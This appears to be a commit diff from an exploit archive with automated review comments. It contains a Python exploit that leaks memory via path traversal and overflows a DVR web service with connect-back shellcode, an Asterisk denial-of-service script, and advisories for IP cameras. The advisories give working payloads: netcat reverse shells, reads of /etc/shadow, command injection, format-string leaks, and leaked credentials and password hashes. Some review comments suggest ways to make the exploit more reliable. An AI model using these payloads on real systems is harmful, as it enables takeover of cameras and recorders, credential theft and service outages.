pids = []
for line in r.recvall().splitlines():
res = re.match(r'.*\.\./\.\./proc/([0-9]+)"', line)
if res:
pids.append(int(res.group(1)))
r.close()
context.log_level = c
logp.success('found %d processes' % len(pids))

with log.progress("searching for PID of '%s'" % sofia_cmdline) as logp:
pid_sofia = None
pids.sort(reverse=True)
for pid in pids:
logp.status(str(pid))
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../proc/%d/cmdline HTTP' % pid)
resp = r.recvall().splitlines()
r.close()
context.log_level = c
if sofia_cmdline + '\x00' == resp[-1]:
pid_sofia = pid
logp.success(str(pid_sofia))
break
if not pid_sofia:
logp.failure('did not found')

return pid_sofia

def getmodelnumber():
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../mnt/custom/ProductDefinition HTTP')
for l in r.recvall(timeout=5).decode('ascii').replace(',', '\n').splitlines():
if "Hardware" in l:
modelnumber = l.split(":")[1].split('"')[1]
r.close()
context.log_level = c
return modelnumber

def guessregion(smaps):
for t in range(len(smaps)-7, 1, -1):
if (smaps[t][1][0], smaps[t+1][1][0], smaps[t+2][1][0], smaps[t+3][1][0], smaps[t+4][1][0], smaps[t+5][1][0], smaps[t+6][1][0]) == (8188, 8188, 8188, 8188, 8188, 8188, 8188) and smaps[t][1][1] == 4 and smaps[t+1][1][1] == 4 and smaps[t+2][1][1] == 4 and smaps[t+3][1][1] >= 8 and smaps[t+4][1][1] >= 4 and smaps[t+5][1][1] >= 4 and smaps[t+6][1][1] >= 8:
return (t+3)
return (-1)

# getting stack section base address
# 'k' defines the section which contains the stack
def getleak(pid, interactive):
with log.progress("getting stack section base") as logp:
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../proc/%d/smaps HTTP' % pid)
smaps = []
memStart = False
for line in r.recvall().splitlines():
if memStart:
t += (int(line.split()[1]),)
|
||||
i += 1
|
||||
#if i >= 14:
|
||||
if i >= 7:
|
||||
smaps.append((memStart, t))
|
||||
memStart = False
|
||||
if 'rwxp' in line:
|
||||
memStart = int(line.split('-')[0], 16)
|
||||
i = 0
|
||||
t = ()
|
||||
guess = guessregion(smaps)
|
||||
if guess < 0 or interactive:
|
||||
j = 0
|
||||
for i in smaps:
|
||||
print (j, hex(i[0]), i[1:])
|
||||
j += 1
|
||||
k = int(raw_input('enter stack region id (guessed value = %d): ' % guess))
|
||||
else:
|
||||
k = guess
|
||||
leak = smaps[k][0]
|
||||
r.close()
|
||||
context.log_level = c
|
||||
logp.success(hex(leak))
|
||||
return leak
|
||||
|
||||
# connectback shellcode
|
||||
# badchars: 0x00, 0x0d, 0x20, 0x3f, 0x26
|
||||
def shellcode(lhost, lport):
|
||||
badchars = [0x00, 0x0d, 0x20, 0x3f, 0x26]
|
||||
badchars = map(chr, badchars)
|
||||
|
||||
xscode = "01108fe211ff"
|
||||
xscode += "2fe111a18a78013a8a700221081c0121921a0f02193701df061c0ba10223"
|
||||
xscode += "0b801022023701df3e270137c821301c01df0139fbd507a0921ac27105b4"
|
||||
xscode += "69460b2701df0121081c01dfc046ffff7a69c0a858642f62696e2f736858"
|
||||
xscode += "ffffc046efbeadde"
|
||||
|
||||
h = lambda x: hex(int(x))[2:]
|
||||
h2 = lambda x: h(x).zfill(2)
|
||||
xscode = xscode[:164] + h(lport+0x100).zfill(4) + ''.join(map(h2, lhost.split('.'))) + xscode[176:]
|
||||
xscode = xscode.decode('hex')
|
||||
for badchar in badchars:
|
||||
if badchar in xscode:
|
||||
raise NameError('badchar %s in shellcode!' % hex(ord(badchar)))
|
||||
return xscode
|
||||
|
||||
def restart_dvrapp(c):
|
||||
with log.progress('restarting dvr application') as logp:
|
||||
logp.status('looking up dvrhelper process')
|
||||
c.sendline('ps')
|
||||
cmdline = ''
|
||||
while not 'dvrHelper' in cmdline:
|
||||
cmdline = c.recvline()
|
||||
cmdline = cmdline.split()
|
||||
while not 'ps' in c.recvline():
|
||||
pass
|
||||
sleep(1)
|
||||
logp.status('killing dvrhelper')
|
||||
c.sendline('kill %s' % cmdline[0])
|
||||
sleep(1)
|
||||
cmdline_dvrhelper = ' '.join(cmdline[4:])
|
||||
logp.status('starting dvrhelper: %s' % cmdline_dvrhelper)
|
||||
c.sendline(cmdline_dvrhelper + ' 2>/dev/null &')
|
||||
sleep(1)
|
||||
c.recvuntil(sofia_cmdline)
|
||||
c.recvline()
|
||||
|
||||
def upload_tools(c):
|
||||
with log.progress('uploading tools to /var/.tools') as logp:
|
||||
logp.status('creating dir')
|
||||
c.sendline('rm -fr /var/.tools')
|
||||
sleep(1)
|
||||
c.sendline('mkdir /var/.tools')
|
||||
sleep(1)
|
||||
tools = ['dropbear']
|
||||
upload_blocksize = 1024
|
||||
for tool in tools:
|
||||
toolsize = os.path.getsize('./tools/%s' % tool)
|
||||
b = 0
|
||||
fp = open("./tools/%s" % tool, "rb")
|
||||
for chunk in iter(lambda: fp.read(upload_blocksize), ''):
|
||||
chunkhex = ''.join(['\\x'+chunk.encode('hex')[i:i+2].zfill(2) for i in range(0, len(chunk)*2, 2)])
|
||||
c.sendline("echo -n -e '%s' >> /var/.tools/%s" % (chunkhex, tool))
|
||||
b += len(chunk)
|
||||
logp.status('%s: %d/%d' % (tool, b, toolsize))
|
||||
sleep(0.1)
|
||||
fp.close()
|
||||
c.sendline('chmod +x /var/.tools/%s' % tool)
|
||||
sleep(1)
|
||||
logp.success(' '.join(tools))
|
||||
|
||||
log.info('target is %s:%d' % (target_host, target_port))
|
||||
|
||||
if not args.nolisten:
|
||||
log.info('connectback on %s:%d' % (listen_host, listen_port))
|
||||
|
||||
with log.progress("assembling shellcode") as logp:
|
||||
xscode = shellcode(connectback_host, connectback_port)
|
||||
logp.success("done. length is %d bytes" % len(xscode))
|
||||
|
||||
with log.progress("identifying model number") as logp:
|
||||
modelnumber = getmodelnumber()
|
||||
logp.success(modelnumber)
|
||||
|
||||
log.info('exploiting dir path traversal of web service to get leak addresses')
|
||||
stack_section_base = getleak(findpid(), getleak_interactive)
|
||||
stack_offset = args.offset
|
||||
stack_20 = stack_section_base + stack_offset + 20
|
||||
|
||||
log.info('shellcode address is ' + hex(stack_20))
|
||||
|
||||
payload = "GET "
|
||||
payload += xscode
|
||||
payload += "a" * (299 - len(xscode))
|
||||
payload += p32(stack_20)
|
||||
payload += " HTTP"
|
||||
|
||||
log.info('exploiting buffer overflow in web service url path')
|
||||
log.info('remote shell should gained by connectback shellcode!')
|
||||
|
||||
if not args.nolisten:
|
||||
l = listen(bindaddr=listen_host, port=listen_port, timeout=5)
|
||||
c = l.wait_for_connection()
|
||||
|
||||
r = remote(target_host, target_port)
|
||||
r.sendline(payload)
|
||||
r.recvall(timeout=5)
|
||||
r.close()
|
||||
|
||||
if not args.nolisten:
|
||||
if shell_persistent:
|
||||
restart_dvrapp(c)
|
||||
|
||||
if shell_upload:
|
||||
upload_tools(c)
|
||||
|
||||
c.interactive()
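Review bot: `getmodelnumber()` binds `modelnumber` only inside the `if "Hardware" in l:` branch, so a ProductDefinition response without a Hardware field (or an empty reply after the `recvall(timeout=5)` expires) makes `return modelnumber` raise UnboundLocalError instead of a readable failure; initialise `modelnumber = None` before the loop and report the miss with `log.failure`. Relatedly, `findpid()` and `getleak()` call `r.recvall()` with no timeout while `getmodelnumber()` uses `recvall(timeout=5)`, so a device that keeps the connection open hangs the script in the PID scan; the timeout should be consistent across the three helpers. Minor: the message `'did not found'` should read `'not found'`.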

exploits/multiple/dos/43992.py (Executable file, 80 lines)
@ -0,0 +1,80 @@
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 - AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
# handles crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import sys
import socket
import time

def asteriskSCCP(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
packet =
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')
# Log the packet in hexa and timestamp
fileLog = target + ".log"
logPacket = open(fileLog, "w+")
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
logPacket.close()

# Write bytecodes to socket
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
except socket.error, e:
print 'Sorry, No data available'
continue
s.close()
except socket.error as error:
print error
print "Sorry, something went wrong!"

def howtouse():
print "Usage: AsteriskSCCP.py Hostname Port"
print "[*] Mandatory arguments:"
print "[-] Specify a hostname / port"
sys.exit(-1)

if __name__ == "__main__":
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])

print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
asteriskSCCP(target, port)
except IndexError:
howtouse()
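Review bot: `packet =` ends one line and the `binascii.unhexlify(...)` expression sits on the next, which is a SyntaxError in Python unless the two lines are joined or a backslash continuation is added. In the same loop, the `continue` inside `except socket.error, e:` skips `s.close()`, so every failed `recv` leaks a socket while `while 1` keeps opening new ones; close the socket in a `finally`. The log file is opened with `"w+"` on every iteration, so `target + ".log"` only ever holds the last packet sent, which defeats the stated purpose of the log; open it in append mode. Minor: the comment `# Bind port` sits above `s.connect(...)`, and the file is Python 2 only (`except socket.error, e:`, bare `print`), which the header should state.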

exploits/multiple/dos/43998.txt (Normal file, 123 lines)
@ -0,0 +1,123 @@
[STX]

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day


-[ PoC ]-

1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'

[...]
function initHideWidget(){
document.getElementById("devip").value = "192.168.57.20";
document.getElementById("cameraid").value = 1;
document.getElementById("streamid").value = 1;
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
document.getElementById("lg").value = "BBBB";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
document.getElementById("ismotorize").value = 1;

[...]
Note: 'BBBB' are hiding within '5e3006db'

2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
function initHideWidget(){
document.getElementById("ip").value = "192.168.57.20";
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
[...]


-[ Affected OEM ]-

Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
AFM Vision
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D

[ETX]
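Review bot: the advisory never names the firmware build or `nsd` binary version that was tested, and with `Full Disclosure: 0-Day` and no vendor contact it gives an operator nothing to check a device against or a fix to look for; a 'Tested on' line and a note on vendor contact (or its absence) belong in the header block, as the other bashis advisories in this commit have. The two PoCs and `Note: 'BBBB' are hiding within '5e3006db'` show the format string reading stack contents, but the text never states whether the bug is read-only or also allows a write, which is what decides its severity. Minor: `AFM Vision` appears twice in the Affected OEM list.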

exploits/multiple/remote/43984.txt (Normal file, 28 lines)
@ -0,0 +1,28 @@
[STX]

Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)

Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view

Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT


Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT

[ETX]
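Review bot: the header says `fixed Q3/2016 by Axis` but gives no firmware version or Axis advisory ID, so a reader cannot tell which builds are still exposed; add the affected and fixed versions the way the other bashis advisories in this commit do. The `Conditions:` line (`The cam must be configure to allow anonymous view`) is the operative mitigation and should be stated as one: with anonymous viewing disabled, the unauthenticated path to `/incl/image_test.shtml?camnbr=` is closed. Minor: both `<TARGET PORT> RHOST PORT` lines are missing the `=` the other placeholder lines use.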

exploits/multiple/remote/43985.txt (Normal file, 89 lines)
@ -0,0 +1,89 @@
[STX]

Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (August 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 1, 2017
Full Disclosure: 90 days (due to the large volume of affected devices)

heap: Non-Executable + ASLR
stack: Non-Executable + ASLR

Axis Vulnerability ID: ACV-120444

Vulnerable: MPQT series < v7.20.x/6.50.1.2
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)

Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
Not vulnerable (Releases from October to November 2017):

1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)

[Note]
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
https://www.axis.com/global/en/support/firmware
https://www.axis.com/global/en/support/product-security


Timeline:
August 31, 2017: Initiated contact with Axis
September 1, 2017: Response from Axis
September 5, 2017: ACK of findings from Axis
September 9, 2017: Received first test image from Axis to verify fix
September 28, 2017: Received first advisory draft from Axis
November 15-27, 2017: Coordination with Axis for Full Disclosure
December 1, 2017: Full Disclosure

-[General Information]-
"CGI_decode" in /usr/lib/libcgiparser.so suffers from a bug in the handling URL decode of '%xx'.
The CGI_decode does not check the size of what it is about to decode, it always assumes "%" plus two chars.

By supplying only one single '%', 'CGI_decode' will try to URL decode [% + NULL + Next char], which lead to the return of a longer string than expected as the new string will be read until the next NULL. ([NULL string termination + Next char] are replaced with one '?')

-[Information leakage]-

The "%"" in "GET /index.shtml?size=%"" triggers both "information disclosure" and "heap overflow", depending on how it will be used.

[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80

[Result]
...
var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
...


-[Heap Overflow]-

To trigger the heap overflow we need to send ~20KB amount of data that would normally not be accepted by the Web server.
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send max 8162 bytes in each of them.

[Note]
Without the information leakage bug above, the realloc() will never be triggered regardless how much data is sent.

[PoC]
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80

[Result]
/var/log/info.log
2017-05-08T08:22:23.801+00:00 axis [ INFO ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***

-[Vulnerable binaries]-

/bin/ssid (Server Side Include Daemon)
/bin/urldecode (URL Command Line Tool)
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
/usr/bin/wsd (Web Service Dispatch Daemon)
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)

/usr/lib/libwsevent.so
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)

Have a nice day
/bashis

[ETX]
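Review bot: `Not vulnerable (Releases from October to November 2017):` for the PACS series ends with a colon and is followed directly by the numbered findings, so the fixed PACS versions (the counterpart of `> v7.30/6.50.1.3` for MPQT) are missing, and a reader relying on the version lines rather than the ACV-120444 release-note search will be misled. In the Information leakage section the request is written as `"GET /index.shtml?size=%""` with a stray extra double quote, while the PoC below uses `size=AAAA%`; the two should agree. Also the heap overflow PoC sends 8162 + 2157 = 10319 header bytes while the text says `~20KB` is needed; one sentence reconciling the two would help.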

exploits/multiple/remote/43999.txt (Normal file, 34 lines)
@ -0,0 +1,34 @@
[STX]

Subject: Uniview RCE and export config PoC
Researcher: bashis <mcw noemail eu> (October 2017)

Attack Vector: Remote
Authentication: Anonymous (no credentials needed)

[Export config]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}

-[tcpdump]-

[check active capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":263,"szUserName":"","u32UserLoginHandle":-1}

[start capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}

[stop capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":0,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}

[download capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}

-[Remote Command Execution]-

[Get /etc/shadow]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":";cp%20/etc/shadow%20/tmp/packetcapture.pcap;"}

[get the result]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}

[ETX]
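Review bot: `stSelNicName` in the `cmd:264` request is evidently handed to a shell unescaped (the PoC swaps `eth0` for `;cp%20/etc/shadow%20/tmp/packetcapture.pcap;` and then collects the result via `cmd:265`), so the device-side fix is to accept only an interface name present in the system's interface list; the advisory should say so. It should also record the model and firmware tested, the release date and the disclosure status, which the other bashis advisories in this commit carry and this one lacks. `szUserName:""` with `u32UserLoginHandle:-1` being accepted for `cmd:255` (config export) is a separate missing-authentication issue and deserves its own line in the header.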

exploits/multiple/remote/44000.txt (Normal file, 201 lines)
@ -0,0 +1,201 @@
[STX]

Subject: Vitek RCE and Information Disclosure (and possible other OEM)

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day

heap: Executable + Non-ASLR
stack: Executable + ASLR

-[Manufacture Logo]-
_ _ _ _ _ _ _ _ _ _ _ _
\ _ _ _ _ _ ___
/ /__/ \ |_/
/ __ / - _ ___
/ / / / / /
_ _ _ _/ / / \_/ \_ ______
___________\___\__________________


-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC


-[Stack Overflow RCE]-

[Reverse netcat shell]

$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81

[Listener]

$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337

Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.

pwd
/opt/fw

whoami
root
exit
$

Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0

H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system

H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system

N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system


-[PHP RCE]-

Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)

[Reverse netcat shell (forking)]

$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST

200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]

[Listener]

$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.

pwd
/opt/www/htdocs/system

whoami
nobody

ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$

-[Login / Password Disclosure]-

curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, login and password can be found for admin login and all connected cameras]

Admin l/p
[...]
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

Cameras l/p
[...]
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

-[Hardcode l/p]-
FTP: TCP/10021
TELNET: TCP/10023

/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh

-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$

